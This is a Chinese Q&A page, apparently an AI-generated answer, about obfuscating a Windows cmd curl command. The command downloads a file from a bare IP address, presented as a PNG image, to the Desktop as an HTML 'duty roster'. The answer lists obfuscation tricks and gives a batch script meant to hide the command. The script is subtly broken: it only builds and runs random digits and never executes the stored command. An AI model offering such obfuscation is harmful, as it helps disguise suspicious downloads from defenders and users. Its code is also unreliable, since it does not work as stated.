有一段放在win10 cmd中执行的命令curl -o CUsersusernameDesktop生成值日表html http103215362268007uploadimgimg202309081694156831958000png生成一个将其混淆后的命令同样可以执行相应的命令
将命令混淆后可以使用以下方法:
- 将命令分解为多个部分,并使用变量存储每个部分。
- 使用字符串连接符将这些部分连接起来。
- 在连接的字符串中添加一些无关字符或者特殊字符,以增加混淆度。
- 最后,将混淆后的命令传递给cmd执行。
以下是将命令混淆后的示例:
set "cmd=curl -o C:\Users\%%username%%\Desktop\生成值日表.html http://103.215.36.226:8007/uploadimg/img/2023/0908/1694156831958000.png"
set "obfuscatedCmd="
for /L %%i in (1,1,100) do (
setlocal enabledelayedexpansion
set "randomChar=!random:~-1!"
set "obfuscatedCmd=!obfuscatedCmd!!randomChar!"
endlocal
)
cmd /c %obfuscatedCmd%
请注意,混淆后的命令可能会导致不易理解和调试,使用时需谨慎
原文地址: http://www.cveoy.top/t/topic/i1Wx 著作权归作者所有。请勿转载和采集!